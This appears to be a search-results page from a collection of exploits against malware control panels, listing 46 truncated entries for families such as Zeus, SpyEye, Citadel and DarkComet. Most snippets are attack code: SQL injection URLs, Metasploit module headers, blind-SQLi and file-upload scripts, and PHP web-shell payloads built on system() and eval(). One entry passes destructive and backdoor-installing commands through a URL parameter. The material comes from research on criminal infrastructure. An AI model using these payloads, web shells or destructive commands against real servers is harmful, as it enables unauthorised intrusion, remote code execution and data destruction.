46 matches found
Malware exploit: Rovnix
Type: Hash Collision Author: Xylitol ?php / Defeat the weak hash function of Rovnix to get password from a hash. / $HASH = 'fbff791ef0770855e599ea6f87d41653'; $value = getNumber$HASH; $search = search$value, $HASH; echo'Hash: ' . $HASH . 'br /'; echo'Value: ' . $value . 'br /'; echo'Search: '...
Malware exploit: Legend
Type: Remote Code Execution Author: shipcod3 / Jay Turla This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include...
Malware exploit: Silence Winlocker
SQL injection. http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334...
Malware exploit: Keitaro Tds
Keitaro TDS Type: Auth Bypass Author: Xylitol //////////\ / / / / - / / / / / / / /\ / / / / - / // / / / / / / / / // // ///////////////\nf! \/\\\\\\\/ C Y B E R C R i M E W H Q Keitaro TDS Auth bypass v6.x - v7.7.10 Discovered on.: 28/03/2014 Released on...: 31/10/2016 1 go to...
Malware exploit: Smoke Loader
Type: SQLi http://localhost/control.php?id=1 http://localhost/guest.php?id=1 POST...
Malware exploit: Madnesspro
Type: SQLi Vuln: Author: bwall !/usr/bin/env python2 -- coding: utf-8 -- Exploit Title: Madness Pro = 1.14 SQL injection Date: June 05, 2014 Exploit Author: @botnethunter Version: 1.14 Tested on: Apache2 - Ubuntu - MySQL Unauthenticated SQL injection in Madness Pro panel = 1.14 Proof of Concept...
Malware exploit: Keybase
Type: Upload vulnerability Author: Unit42 import requests import sys if lensys.argv != 2: print "Usage: %s phpfile" % file sys.exit1 URL = "" print "Sending request..." multiplefiles = 'file', 'WIN-JJFOIJGL6514222.php', opensys.argv1, 'rb' r = requests.postURL + "image/upload.php",...
Malware exploit: Athena
Type: SQLi Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&countrycode=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now...
Malware exploit: Xdh
Type: Remote Code Execution Author: shipcod3 / Jay Turla This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include...
Malware exploit: Kaiten
Type: Remote Code Execution Author: shipcod3 / Jay Turla This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include...
Malware exploit: Zeus
Zeus & Zeus Evo Wikipedia Type: SQLi Vuln: http://localhost/gate.php?ip=8.8.8.8...
Malware exploit: Vertexnet
Type: Flood Bots Author: Xylitol !/usr/bin/perl VertexNet v1.1.1 Flood Bots http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791 Xyl2k! :þ use HTTP::Request; use LWP::UserAgent; $URL = "http://localhost/Panel/adduser.php";...
Malware exploit: Spyeye
Wikipedia Type: SQLi http://localhost/frmboa-grabbersub.php?dt=11%2F11%2F1998...
Malware exploit: Rockloaded
Type: SQLi and shell file upload Author: Danail Velev Contact: ICQ: 209030 / [email protected] Website: http://colocation.bg/ Software: https://github.com/colocation/RockLoader-source Original Release: https://cxsecurity.com/ascii/WLB-2016070003...
Malware exploit: Atsengine
Type: Information Disclosure Author: Xylitol pre ?php $url = getURL; if $url !== NULL $database = @filegetcontents$url . '/db/database.db'; if $database !== FALSE fileputcontents'tmp.db', $database; $passwordmd5 = getOption'passwordmd5'; $pkey = getOption'pkey'; $jabberon = getOption'jabberon';...
Malware exploit: Cythosia
Type: Stored XSS and iFrame redirect Click add task Command: IFRAME SRC="whateverekorlemonpartyorwhatnot.com" /IFRAME Then Click Create Task Finally click Tasks. VOILA! Credits to asterea for finding this botnet panel...
Malware exploit: Filestealer
FileStealer v1.3 Type: Upload vulnerability Author: Xylitol !-- FileStealer v1.3 panel upload vulnerability -- !-- Panel hash: be19e93878130b2f57d42d4dcf5ffcf0 -- form method="POST" action="http://localhost/panel/up.php" enctype="multipart/form-data" File: input type="file" name="file" / br / HWI...
Malware exploit: Neutrino
Type: Blind SQL injection Author: Malwaretech import requests import time import sys waitdelay = 1 def brutelengthurl, field: for i in range0, 30: Injection = "/tasks.php?ip=1', IFLENGTHSELECT %s FROM users WHERE uid='1' = %d, SLEEP%d, 0, '1', '1', '1', '1', '1','1','1';--...
Malware exploit: Umbra
Type: SQLi Vuln: http://localhost/deletecommand.php?deleteID=1...
Malware exploit: Gorynch\diamond
Gorynch\diamond Type: File Upload Vulnerability Author: Xylitol Gorynych v4.2.0.257- File Upload Vulnerability Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability File naming convention: file.log.php go to logs/dump/file.log.php file.jpg.php go to logs/scr/file.jpg.php file.LOG.php go to...
Malware exploit: Poisonivy
Type: Stack Buffer Overflow Author: Gal Badishi This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def...
Malware exploit: Zskimmer
Type: SQLi Vuln: http://localhost/process.php?xy=2...
Malware exploit: Phoenix
Phoenix Exploit Kit Initial Discovery Type: Remote Code Execution Author: CrashBandicot/@DosPerl Tested on: MSWin32 Vuln file : geoip.php 492. isset$GET'bdr' ? eval$GET'bdr' : explode'nop','nop nop nop'; PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo; Screen :...
Malware exploit: Xanity
Type: File Upload Author: Xiphos Research Ltd. TorCTPwn I was having a look at the C&C panel of the Xanity RAT for a bit of amusement, and noticed that it suffers an absurdly trivial shell upload vulnerability, outlined below. See: upload.php and note we can upload whatever the hell we want to a...
Malware exploit: Caberp
Type: Remote Code Execution Author: Xylitol table width="607" border="0" tr tdform method="POST" action="?php basename$SERVER'PHPSELF' ?" label for="carberp"Domain: /label input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" / input type="submit" name="button"...
Malware exploit: Solar
SQL injection. localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD...
Malware exploit: Sakura
Sakura Type: SQLi http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor...
Malware exploit: Pbot
Type: Remote Code Execution Author: Juan Vasquez This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp...
Malware exploit: W3tw0rk
Type: Remote Code Execution Author: shipcod3 / Jay Turla This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include...
Malware exploit: Casinoloader
Dexter Casinoloader Type: SQLi Vuln: POSTDATA page=1&val=1 Type: SQLi POSTDATA page=1&val=1...
Malware exploit: Atrax
Type: Shell Upload Vulnerability Author: Xylitol import random import string import base64 import urllib import urllib2 CONFIG payload = 'pre?php ifisset$GET"c"system$GET"c";else echo"No input?";?/pre' url = 'http://localhost/atrax/' /CONFIG BOTMODEINSERT = 'b' BOT MODE BOTMODERUNPLUGIN = 'e'...
Malware exploit: Dakcomet
Dakcomet Kevin Breen - DarkComet From Defense To Offense - Identify your Attacker Slides POC by Shawn Denbow and Jesse Herts Wikipedia Vulnerabilities Remote file read Data base poisoning SQL injection DarkComet ToolKit DarkComet Metasploit Module Last updated on 14th Jan 2017 None...
Malware exploit: Ibanking
Type: Panel Upload Vulnerability Author: Xylitol !-- iBanking panel upload vulnerability -- !-- get.php?p=..&i=.&f=dbconfig.php -- form method="POST" action="http://localhost/smsbot/sendFile.php" enctype="multipart/form-data" FiLEZ: input type="file" name="uploadedfile" /br / input type="hidden"...
Malware exploit: Dendroid
Type: Remote Code Execution Author: Xylitol import requests Add URL Set a PHP payload Go to http://website/config.php URL = 'http://localhost/Panel/applysettings.php' PAYLOAD = "isset$GET'tapz' ? eval$GET'tapz' : '" data = 'dbhost' : 'localhost', 'dbname' : 'dendroid', 'dbusername' : 'root',...
Malware exploit: Soraya
Type: XSS Author: Xylitol import requests import time def StrToHexstring: hexstr='' for char in string: intchar = ordchar hexnum = hexintchar.lstrip"0x" hexstr+=hexnum return hexstr ConnectUrl = 'http://localhost/something/bot.php' UserString = 'rome0321' HtmlInject =...
Malware exploit: Herpes
Type: SQL Injection Author: bwall import random import pycurl import urllib import cStringIO import json def ui: try: return unicodei, errors='ignore' except: return i class HerpesNetPanel: def initself, gatewayurl: self.gatewayurl = gatewayurl @staticmethod def getfieldgateway, table, column, ro...
Malware exploit: Zemra
Type: Remote Code Execution Vuln: -a Author: shipcod3 / Jay Turla This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include...
Malware exploit: Phase
Type: Blind SQL injection vulnerability Author: Xylitol ?php // Start with PHP CLI php pwn.php settimelimit0; // Adjust this : define'SLEEPTIME', '4'; define'PAGETIME', 4; define'URL', 'http://localhost/Phase/'; echo'attacking ' . URL . PHPEOL; getstring'username'; getstring'password'; function...
Malware exploit: Citadel
Type: Remote Code Execution Author: Xylitol import urllib import urllib2 Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability Work only on windows box def requesturl, params=None, method='GET': if method == 'POST': urllib2.urlopenurl, urllib.urlencodeparams.read elif method ==...
Malware exploit: Tinba
Wikipedia Type: SQLi \tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: botuid=1&botcomment=mate POST...
Malware exploit: Madness Pro 1.14
Type: SQL Injection Author: bwall !/usr/bin/env python2 -- coding: utf-8 -- Exploit Title: Madness Pro = 1.14 SQL injection Date: June 05, 2014 Exploit Author: @botnethunter Version: 1.14 Tested on: Apache2 - Ubuntu - MySQL Unauthenticated SQL injection in Madness Pro panel = 1.14 Proof of Concep...
Malware exploit: Herpes Net 3.0
Type: SQL Injection Author: bwall import random import pycurl import urllib import cStringIO import json def ui: try: return unicodei, errors='ignore' except: return i class HerpesNetPanel: def initself, gatewayurl: self.gatewayurl = gatewayurl @staticmethod def getfieldgateway, table, column, ro...
Malware exploit: Filestealer 1.3
FileStealer v1.3 Type: Upload vulnerability Author: Xylitol !-- FileStealer v1.3 panel upload vulnerability -- !-- Panel hash: be19e93878130b2f57d42d4dcf5ffcf0 -- form method="POST" action="http://localhost/panel/up.php" enctype="multipart/form-data" File: input type="file" name="file" / br / HWI...
Malware exploit: Vertexnet V1.1.1
Type: Flood Bots Author: Xylitol !/usr/bin/perl VertexNet v1.1.1 Flood Bots http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791 Xyl2k! :þ use HTTP::Request; use LWP::UserAgent; $URL = "http://localhost/Panel/adduser.php";...
Malware exploit: Citadel Server V1.3.5.1
Type: Remote Code Execution Author: Xylitol import urllib import urllib2 Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability Work only on windows box def requesturl, params=None, method='GET': if method == 'POST': urllib2.urlopenurl, urllib.urlencodeparams.read elif method ==...
Malware exploit: Gorynch Diamond V4.2.0.257
Type: File Upload Vulnerability Author: Xylitol !DOCTYPE html html head titleGorynych v4.2.0.257- File Upload Vulnerability/title !-- Panel.zip hash: e698cf7cc57b20c02fce6de83299b75b -- /head body h1 Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability /h1 form...